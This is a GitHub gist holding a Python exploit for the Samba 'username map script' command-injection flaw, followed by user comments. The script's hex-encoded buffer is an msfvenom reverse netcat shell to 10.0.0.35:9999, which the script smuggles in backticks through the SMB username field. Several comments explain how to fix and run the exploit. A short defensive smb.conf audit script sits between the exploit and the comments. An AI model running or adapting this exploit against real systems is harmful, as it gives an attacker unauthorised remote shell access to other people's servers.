#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
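
A defender-side check, added here as an example and not part of the gist: the command in the username field only reaches a shell on a Samba server whose smb.conf enables `username map script`, so the Python 3 code below audits a config for that parameter and flags account names carrying shell metacharacters such as the backticks used above. The sample config, the script path and the account names are constructed.

```python
import re

# Shell metacharacters that have no place in an SMB account name; the gist's
# username relies on the backtick form.
SHELL_META = re.compile(r"`|\$\(|[;|&<>\n]")

def suspicious_username(name):
    """Return the distinct shell metacharacter sequences found in name."""
    return sorted(set(SHELL_META.findall(name)))

def _norm(param):
    # smb.conf parameter names ignore case and embedded whitespace.
    return re.sub(r"\s+", "", param).lower()

def find_username_map_script(conf_text):
    """Return [(section, value)] for each active 'username map script' line."""
    hits, section, pending = [], None, ""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not pending and (not line or line[0] in "#;"):
            continue                      # blank line or comment
        line = pending + line
        if line.endswith("\\"):           # continuation onto the next line
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        param, sep, value = line.partition("=")
        if sep and _norm(param) == "usernamemapscript" and value.strip():
            hits.append((section, value.strip()))
    return hits

# Constructed sample input: config, script path and account names are made up.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map  Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAMPLE_USERS = ["alice", "CORP\\bob", "/=`nohup CMD`", "svc_backup$"]

if __name__ == "__main__":
    print(find_username_map_script(SAMPLE_CONF))
    print([u for u in SAMPLE_USERS if suspicious_username(u)])
```

A trailing `$` on a machine-style account name is not flagged; only the `$(` substitution form is.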

@ar0dd ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

@rehamun rehamun commented Sep 4, 2019

Could you please clarify how the code is going to recognize the RHOST IP or the URL?

@jeffinm jeffinm commented Feb 26, 2020

Hi
I am getting this error, while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
  File "samba-usermap-exploit.py", line 4, in <module>
    from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

@Anass-bekar Anass-bekar commented Mar 17, 2020

Download mysmb.py

@toddjones1984 toddjones1984 commented Mar 20, 2020

I downloaded impacket and mysmb.py but I'm still getting errors. Any help would be appreciated.

Traceback (most recent call last):
  File "3.0.20.py", line 3, in <module>
    from smb.SMBConnection import SMBConnection
  File "/opt/smb/impacket/impacket/smb.py", line 49, in <module>
    from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
acket and mysmb.py and I'm still having issues.

@edenbomb edenbomb commented May 27, 2020

According to http://http.kali.org/kali/pool/main/p/pysmb/, when we try to install smb for python2 it will error due to file not found.
So I would like to suggest an edit:
Old :
print "\nUsage: " + sys.argv[0] + " \n"
New :
print ("\nUsage: " + sys.argv[0] + " \n")

and using python3 instead.

Remark :
Install command ==> sudo apt-get install -y python3-smb

@CybertSys CybertSys commented Jul 6, 2020

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

@MidnightSeer MidnightSeer commented Jul 14, 2020

A tip, stick with python2, pip install pysmb still works...this exploit is the simplest they come.

@Anonimo501 Anonimo501 commented May 30, 2021

Hi.

After several errors I ran pip install pysmb and then fixed the print " error by adding the parentheses (""). After doing all this I was able to run the exploit, but then a new problem came up, which is the following:

python samba-usermap-exploit.py 192.168.1.70
Traceback (most recent call last):
  File "/home/botache/samba-usermap-exploit.py", line 42, in <module>
    assert conn.connect(sys.argv[1], 445)
  File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 127, in connect
    self._pollForNetBIOSPacket(timeout)
  File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 600, in _pollForNetBIOSPacket
    raise SMBTimeout
smb.base.SMBTimeout

If anyone knows the solution to this, I would appreciate it.
Regards and thanks.

OK, coming back, I realize that you have to create the payload yourself with the command: msfvenom -p cmd/unix/reverse_netcat LHOST=ipatacante LPORT=4444 -f python

But after generating it and trying again to send the attack I get the following:
Traceback (most recent call last):
  File "/home/botache/samba-usermap-exploit.py", line 38, in <module>
    username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

I still haven't solved it or found the solution for it; if anyone can help, thank you very much.

@Mohammed-Aljohani Mohammed-Aljohani commented Jul 4, 2021

To run this script successfully, follow the steps below:
1- sudo pip install pysmb
2- Add parentheses to the print function because we will use python3, so it will look like this: print ("\nUsage: " + sys.argv[0] + " \n")
3- Since we can't concatenate str (not "bytes") to str, we will decode our bytes in line 38 and then concatenate, so it will look like this: username = "/=nohup " + buf.decode + ""

@cybertuxh4xor cybertuxh4xor commented Jul 29, 2021

Help with this issue, please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
  File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in <module>
    assert conn.connect(sys.argv[1], 445)
AssertionError
